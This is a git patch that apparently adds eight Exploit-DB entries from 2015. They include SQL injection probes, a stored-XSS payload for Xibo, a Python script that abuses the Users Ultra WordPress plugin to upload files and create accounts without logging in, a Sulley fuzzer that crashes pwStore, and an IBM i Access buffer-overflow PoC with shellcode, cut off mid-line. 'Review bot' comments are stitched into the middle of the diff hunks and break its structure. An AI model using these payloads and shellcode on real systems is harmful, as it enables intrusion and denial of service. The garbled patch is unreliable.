From 043724668fd027fe94f8d2adbe6ffe2be44bedfa Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 19 Nov 2015 05:03:31 +0000
Subject: [PATCH] DB: 2015-11-19 8 new exploits
---
 files.csv | 10 +-
 platforms/asp/webapps/38749.txt | 7 +
 platforms/php/webapps/38744.txt | 24 +++
 platforms/php/webapps/38745.txt | 11 ++
 platforms/php/webapps/38746.html | 75 ++++++++++
 platforms/php/webapps/38748.txt | 7 +
 platforms/php/webapps/38750.txt | 96 ++++++++++++
 platforms/windows/dos/38747.py | 45 ++++++
 platforms/windows/local/38751.txt | 233 ++++++++++++++++++++++++++++++
 9 files changed, 507 insertions(+), 1 deletion(-)
 create mode 100755 platforms/asp/webapps/38749.txt
 create mode 100755 platforms/php/webapps/38744.txt
 create mode 100755 platforms/php/webapps/38745.txt
 create mode 100755 platforms/php/webapps/38746.html
 create mode 100755 platforms/php/webapps/38748.txt
 create mode 100755 platforms/php/webapps/38750.txt
 create mode 100755 platforms/windows/dos/38747.py
 create mode 100755 platforms/windows/local/38751.txt
diff --git a/files.csv b/files.csv
index 72b4a9ff9..0fb3354d3 100755
--- a/files.csv
+++ b/files.csv
@@ -31880,7 +31880,7 @@ id,file,description,date,author,platform,type,port
 35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Include Vulnerability",2011-02-16,"AutoSec Tools",php,webapps,0
 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0
 35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80
-35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
+35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0
 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
 35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
@@ -35013,3 +35013,11 @@ id,file,description,date,author,platform,type,port
 38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0
 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0
 38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0
+38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0
+38745,platforms/php/webapps/38745.txt,"Xibo 'layout' Parameter HTML Injection Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
+38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
+38747,platforms/windows/dos/38747.py,"Pwstore Denial of Service Vulnerability",2013-04-16,"Josep Pi Rodriguez",windows,dos,0
+38748,platforms/php/webapps/38748.txt,"dBlog CMS 'm' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,php,webapps,0
+38749,platforms/asp/webapps/38749.txt,"Flo CMS 'archivem' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,asp,webapps,0
+38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0
+38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0
diff --git a/platforms/asp/webapps/38749.txt b/platforms/asp/webapps/38749.txt
new file mode 100755
index 000000000..723fc02ae
--- /dev/null
+++ b/platforms/asp/webapps/38749.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/62186/info
+
+Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/blog/index.asp?archivem='
\ No newline at end of file
diff --git a/platforms/php/webapps/38744.txt b/platforms/php/webapps/38744.txt
new file mode 100755
index 000000000..edf584660
--- /dev/null
+++ b/platforms/php/webapps/38744.txt
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/62061/info
+
+appRain CMF is prone to multiple cross-site request-forgery vulnerabilities.
+
+Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
+
+appRain CMF 3.0.2 is vulnerable; other versions may also be affected.
+
+
+
+
+
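Review bot: The only reproduction the 38749 entry carries is the probe `http://www.example.com/blog/index.asp?archivem='`, which shows at most that a quote reaches the query; nothing records what the reporter observed (a database error message, or a true/false response difference) that distinguishes an injectable `archivem` from an ordinary error page, so a reader can neither verify nor classify the flaw. Add one line under the probe stating the observed evidence. The summary also leaves the remediation implicit; state it: `Fix: pass archivem to the query as a bound parameter rather than filtering quotes.`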
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/38745.txt b/platforms/php/webapps/38745.txt
new file mode 100755
index 000000000..36cc5ddd1
--- /dev/null
+++ b/platforms/php/webapps/38745.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/62063/info
+
+Xibo is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.
+
+Xibo 1.4.2 is vulnerable; other versions may also be affected.
+
+POST: /index.php?p=layout&q=add&ajax=true
+
+Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0
\ No newline at end of file
diff --git a/platforms/php/webapps/38746.html b/platforms/php/webapps/38746.html
new file mode 100755
index 000000000..6cab195da
--- /dev/null
+++ b/platforms/php/webapps/38746.html
@@ -0,0 +1,75 @@
+source: http://www.securityfocus.com/bid/62064/info
+
+Xibo is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
+
+Xibo 1.4.2 is vulnerable; other versions may also be affected.
+ + + Xibo - Digital Signage 1.4.2 CSRF Exploit. + + +
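Review bot: Of the 38744 hunk's 24 added lines, everything after `appRain CMF 3.0.2 is vulnerable; other versions may also be affected.` is an empty `+` line, so the entry as committed names no endpoint, no form and no parameter — the CSRF forms the title refers to appear to have been lost before import, presumably because they were HTML markup. Either restore the form markup from the BID 62061 source, or add a line such as `PoC: HTML forms not available; see source advisory.` so readers do not mistake the file for a complete reproduction. As it stands "multiple" vulnerabilities identifies zero actions to protect.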
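Review bot: The `Data:` line injects into two fields, `layout` (an `img onerror` payload) and `description` (an `iframe`), but the summary and the index title only name the `layout` parameter; add a sentence noting that `description` is rendered unsanitized too, otherwise a fix that filters only `layout` will look complete. The entry also says nothing about the privilege needed to reach `POST /index.php?p=layout&q=add&ajax=true`; adding a layout is very likely a logged-in action in Xibo, which would make this stored XSS from a low-privileged account against administrators rather than an unauthenticated issue — confirm and state it.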

Please wait...

+ + +
diff --git a/platforms/php/webapps/38748.txt b/platforms/php/webapps/38748.txt
new file mode 100755
index 000000000..7cb0ec030
--- /dev/null
+++ b/platforms/php/webapps/38748.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/62146/info
+
+dBlog CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/dblog/storico.asp?m=[Sql Injection]
\ No newline at end of file
diff --git a/platforms/php/webapps/38750.txt b/platforms/php/webapps/38750.txt
new file mode 100755
index 000000000..212b682a4
--- /dev/null
+++ b/platforms/php/webapps/38750.txt
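Review bot: Only the title text, `Please wait...` and blank added lines remain of the 38746 HTML PoC; the self-submitting form that would carry the forged request is absent from the hunk, so neither the target URL nor the forged fields can be read from the file. The summary's claim that an attacker may `gain access to the affected application` implies a privileged request such as creating or modifying a user, and that is exactly the detail a reader needs; restore the form from the BID 62064 source or record the method, path and parameters of the forged request inline. Whether that request is accepted without any per-session token is the actual defect and should be stated explicitly.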
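Review bot: The 38748 PoC targets `storico.asp`, an ASP endpoint, yet the file is created under `platforms/php/webapps/` and indexed with platform `php`, while the parallel 38749 Flo CMS entry (`index.asp`) is correctly filed under `asp`; move it to `platforms/asp/webapps/38748.txt` and fix the files.csv row to match, or platform-filtered searches will miss it. The payload `m=[Sql Injection]` is a placeholder that records no observed evidence; one line stating what the reporter saw (error text or a differential response) would let a reader confirm the finding.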
@@ -0,0 +1,96 @@
+* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
+* Discovery Date: 2015/10/27
+* Public Disclosure Date: 2015/12/01
+* Exploit Author: Panagiotis Vagenas
+* Contact: https://twitter.com/panVagenas
+* Vendor Homepage: http://usersultra.com
+* Software Link: https://wordpress.org/plugins/users-ultra/
+* Version: 1.5.50
+* Tested on: WordPress 4.3.1
+* Category: webapps
+
+Description
+================================================================================
+
+WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.
+
+Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.
+
+Details
+================================================================================
+
+The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:
+
+1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
+2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
+ file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
+ ```php
+ if (isset($_POST['uultra-form-cvs-form-conf']))
+ {
+ /* Let's Update the Profile */
+ $this->process_cvs($_FILES);
+ }
+ ```
+3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
+4. `XooUserUser::process_cvs()` method process every file in $_FILES super-global by only making a check if the file has a `csv` extension
+
+In addition we mark the following points:
+
+1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
+2. A welcome email is send if `$_POST["uultra-send-welcome-email"]` is set to 1
+3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
+4. Any additional columns present in the csv file are stored in `usermeta`
+5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site
+
+PoC
+================================================================================
+
+The following Python3 script forms a csv file and uploads it to a site
+
+```python3
+#!/usr/bin/python3
+import requests
+import csv
+import tempfile
+
+url = 'http://example.com/'
+
+postData = {
+ 'uultra-form-cvs-form-conf': 1,
+ 'uultra-send-welcome-email': 1,
+ 'uultra-activate-account': 'pending'
+}
+
+csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
+csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']
+
+csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')
+
+wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
+
+wr.writerow(csvFileHeader)
+wr.writerow(csvFileRow)
+
+csvFile.seek(0)
+
+files = {'file.csv': csvFile}
+
+r = requests.post(url, data=postData, files=files)
+
+exit(0)
+```
+
+Timeline
+================================================================================
+
+2015/10/29 - Vendor notified via email
+2015/11/11 - Vendor notified via contact form in his website
+2015/11/13 - Vendor notified via support forums at wordpress.org
+2015/11/14 - Vendor responded and received report through email
+2015/11/15 - Vendor responded
+2015/11/15 - Patch released
+
+Solution
+================================================================================
+
+Update to version 1.5.59
diff --git a/platforms/windows/dos/38747.py b/platforms/windows/dos/38747.py
new file mode 100755
index 000000000..f3154823b
--- /dev/null
+++ b/platforms/windows/dos/38747.py
@@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/62112/info
+
+pwStore is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the application, denying service to legitimate users.
+
+pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/env python
+from sulley import *
+import sys
+import time
+
+s_initialize("HTTP")
+
+s_static("GET / HTTP/1.1\r\n")
+s_static("Host")
+s_static(":\x0d\x0a")
+s_static(" ")
+s_string("192.168.1.39")
+s_static("\r\n")
+s_static("\r\n")
+
+print "Instantiating session"
+sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
+print "Instantiating target"
+target = sessions.target("192.168.1.39", 443)
+#target.procmon = pedrpc.client("127.0.0.1", 26002)
+#target.netmon = pedrpc.client("127.0.0.1", 26001)
+
+target.procmon_options = {
+ "proc_name" : "savant.exe",
+ "stop_commands" : ['wmic process where (name="savant.exe") delete"'],
+ "start_commands" : ['C:\\savant\\savant.exe'],
+}
+
+
+print "Adding target"
+sess.add_target(target)
+
+print "Building graph"
+sess.connect(s_get("HTTP"))
+
+print "Starting fuzzing now"
+sess.fuzz()
diff --git a/platforms/windows/local/38751.txt b/platforms/windows/local/38751.txt
new file mode 100755
index 000000000..83f7eb653
--- /dev/null
+++ b/platforms/windows/local/38751.txt
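Review bot: The Details section shows the real defect — `process_cvs($_FILES)` is reached from the class constructor on any request carrying `uultra-form-cvs-form-conf`, with no authentication, capability or nonce check — yet the Description frames it only as missing MIME and size checks and the Solution names a version without saying what must change. State that the fix has to gate the handler on an authenticated user with the right capability and a nonce (in WordPress terms `current_user_can()` plus `check_admin_referer()`/`wp_verify_nonce()`), since tighter file checks alone leave the unauthenticated account-creation path from point 1 open. The PoC never inspects the response, so it reports nothing; replace the tail with `r = requests.post(url, data=postData, files=files, timeout=30)` / `print(r.status_code)` / `exit(0 if r.ok else 1)`. The header's `Public Disclosure Date: 2015/12/01` also contradicts the timeline (patch released 2015/11/15) and the 2015-11-18 date in files.csv; reconcile them.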
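Review bot: The file is committed as `.py`, but its first seven added lines are uncommented advisory prose, so running it fails with a SyntaxError on the `source:` line; prefix those lines with `#` or wrap them in a module docstring. The process-monitor options name `savant.exe` and `C:\\savant\\savant.exe`, which is not pwStore, so the restart hooks (commented out anyway at `#target.procmon = ...`) appear copied from a Savant harness and would never restart the target — point them at the pwStore binary or drop the dict. More importantly this is a Sulley fuzzing session over `s_string("192.168.1.39")`, not a crash reproducer: the entry never records which generated Host value crashed pwStore 2010.8.30.0, and the framing `s_static(":\x0d\x0a")` followed by `s_static(" ")` (a CRLF-then-space fold inside the Host header) looks deliberate but is unexplained. A comment stating the crashing case, or a deterministic single-request PoC, would make the DoS claim verifiable.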
@@ -0,0 +1,233 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt
+
+
+Vendor:
+==============
+www.ibm.com
+
+
+Product:
+====================================================
+IBM i Access for Windows
+Release 7.1 of IBM i Access for Windows is affected
+
+
+Vulnerability Type:
+=======================
+Stack Buffer Overflow
+Arbitrary Code Exec
+
+
+CVE Reference:
+==============
+CVE-2015-2023
+
+
+Vulnerability Details:
+=====================
+IBM i Access for Windows is vulnerable to a buffer overflow. A local
+attacker could overflow a buffer and execute arbitrary code on the Windows PC.
+
+client Access has ability to receive remote commands via "Cwbrxd.exe"
+service
+Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253
+
+"Incoming remote command was designed for running non-interactive commands
+and programs on a PC", therefore a remote attacker could execute arbitrary code on the system.
+
+Remediation/Fixes
+The issue can be fixed by obtaining and applying the Service Pack SI57907.
+
+The buffer overflow vulnerability can be remediated by applying Service
+Pack SI57907.
+
+The Service Pack is available at:
+http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html
+
+Workarounds and Mitigations
+None known
+
+CVSS Base Score: 4.4
+CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the
+current score
+CVSS Environmental Score*: Undefined
+CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)
+
+
+Exploit code(s):
+==============================================================================
+
+Three python POC scriptz follow that exploitz various component of IBM i
+Access.
+ + +1) Exploits "ftdwprt.exe", direct EIP overwrite + +import struct,os,subprocess + +pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe " + +#shellcode to pop calc.exe Windows 7 SP1 +sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" +"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" +"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" +"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" +"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" +"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" +"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") + + +# use jmp or call esp in FTDBT.dll under AFPviewer for Client Access +# we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll] +ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00 +(C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll) + +rp=struct.pack('